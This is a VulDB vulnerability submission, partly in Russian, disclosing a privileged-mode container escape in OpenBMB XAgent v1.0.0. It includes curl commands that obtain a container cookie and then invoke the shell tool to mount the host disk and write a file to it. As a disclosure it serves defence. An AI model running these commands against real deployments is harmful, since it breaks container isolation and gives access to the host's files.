Отправить #284427: OpenBMB XAgent v1.0.0 Container EscapesИнформация

Название	OpenBMB XAgent v1.0.0 Container Escapes
Описание	Docker Enabling Privileged Mode Causes Container Escapes. 1. Installation and startup XAgent (https://github.com/OpenBMB/XAgent) ```bash git clone https://github.com/OpenBMB/XAgent.git docker-compose up -d ``` 2. Creating Tool Container ```bash curl -v --request POST 'http://localhost:8080/get_cookie' ... < HTTP/1.1 200 OK ... < set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx; Path=/; SameSite=lax ... ``` Extract container ID: set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx; 3. Execute malicious command escape container ``` curl --request POST 'http://localhost:8080/execute_tool' --header 'Cookie: node_id={{Container ID}}' --header 'Content-Type: application/json' --data \ '{ "tool_name":"shell_command_executor", "arguments":{"command":"mkdir test; mount /dev/sda1 test; echo hello > test/hello.txt"} }' ``` The file created in containers on the host: `cat /boot/hello.txt`.
Источник	⚠️ https://github.com/OpenBMB/XAgent/issues/386
Пользователь	zznQ (UID 64000)
Представление	19.02.2024 10:35 (2 лет назад)
Модерация	29.02.2024 14:24 (10 days later)
Статус	принято
Запись VulDB	255265 [OpenBMB XAgent 1.0.0 Privileged Mode эскалация привилегий]
Баллы	20

Want to stay up to date on a daily basis?

Enable the mail alert feature now!